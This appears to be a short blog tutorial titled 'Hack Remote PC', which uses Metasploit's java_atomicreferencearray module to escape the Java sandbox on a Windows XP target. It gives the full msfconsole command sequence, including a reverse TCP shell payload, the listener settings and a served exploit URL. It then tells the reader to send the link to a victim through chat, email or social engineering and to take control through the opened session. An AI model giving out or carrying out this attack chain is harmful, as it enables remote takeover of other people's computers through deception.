Hack Remote PC with Java Atomic Reference Array Type Violation Vulnerability

posted inBackTrack 5 Tutorials, Penetration Testing on by

This module exploits vulnerability due to the fact that AtomicReferenceArray uses the unsafe class to store a reference in an array directly, which may violate type safety if not used properly. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.

Exploit Targets

0 – Generic (Java Payload) (default)

1 – Windows x86 (Native Payload)

2 – Mac OS X PPC (Native Payload)

3 – Mac OS X x86 (Native Payload)

4 – Linux x86 (Native Payload)

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/java_atomicreferencearray

Msf exploit (java_atomicreferencearray)>set payload generic/shell_reverse_tcp

Msf exploit (java_atomicreferencearray)>set lhost 192.168.1.4 (IP of Local Host)

Msf exploit (java_atomicreferencearray)>set srvhost 192.168.1.4 (This must be an address on the local machine)

Msf exploit (java_atomicreferencearray)>set uripath kolavaridi (The Url to use for this exploit)

Msf exploit (java_atomicreferencearray)>exploit 

Now an URL you should give to your victim http://192.168.1.4:8080/kolavaridi

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Leave a Reply

Your email address will not be published. Required fields are marked *